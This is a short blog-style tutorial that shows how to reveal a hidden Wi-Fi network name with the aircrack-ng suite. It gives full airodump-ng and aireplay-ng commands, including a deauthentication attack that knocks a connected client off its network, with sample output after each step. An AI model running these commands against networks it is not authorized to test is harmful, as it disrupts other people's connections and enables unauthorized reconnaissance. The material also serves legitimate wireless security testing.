How To Hack: Find Hidden Wifi Hotspots

WIFI-HOTSPOTKnown as security through obscurity, many people may hide there ssid’s from broadcasting. Just like mac address blocking this is a worthless form of protection. There is nothing secure about hiding your SSID. Its like the wizard hiding behind the curtain. It does not add any value to your security, compounding complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first. Start airdump-ng by using the following command. Replace the interface with your own.

airodump-ng wlan1

The readout should be something like this.

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

28:EF:01:34:64:91  -29       19        1    0   6  54e  WPA2 CCMP   PSK  linksys

28:EF:01:35:34:85  -42       17        0    0   6  54e  WPA2 CCMP   PSK  <length:  6>

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

28:EF:01:35:34:85  28:EF:01:23:45:67  -57    0 – 1      0        1

As you can see from the devices found we have one with a hidden SSID. This hidden SSID is depicted as <length:  x> with x being the number of letters in the SSID. Some do not display this number. Honestly the length does not much matter to us. What we are interested in is the clients attached to that access point. You see all we have to do is de-authenticate a client and when that client re-authenticates it will send the SSID though the air allowing us to retrieve it. Lets run airodump-ng again and filter out everything but the access point in question with this command.

airodump-ng -c 6 –bssid 28:EF:01:35:34:85 wlan1

explanation of the switches are

-c = channel of target access point
–bssid = MAC address from the target access point

This is what the airdump-ng readout should look like now.

CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK <length: 6>

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 – 1 0 1

Here we can see the target access point with one client attached (BSSID). We now need to de-authenticate this client and see if we can get the SSID during the re authentication.

Now open a new terminal window and leave airodump-ng running.

Run this command in the new terminal.

aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1

This switches to this command are as follows

-0 = Attack mode 30 = number of deauth packets
-a = Target access point mac address
-c = Target client mac address

Now switch back to the original terminal window that still has airodump-ng running.

This is what it should now look like.

CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK hacked

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 – 1 0 1 hacked

As you can see we now know that the SSID for the target router is “hacked”

If it does not work the first time try aireplay-ng again until it works.

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *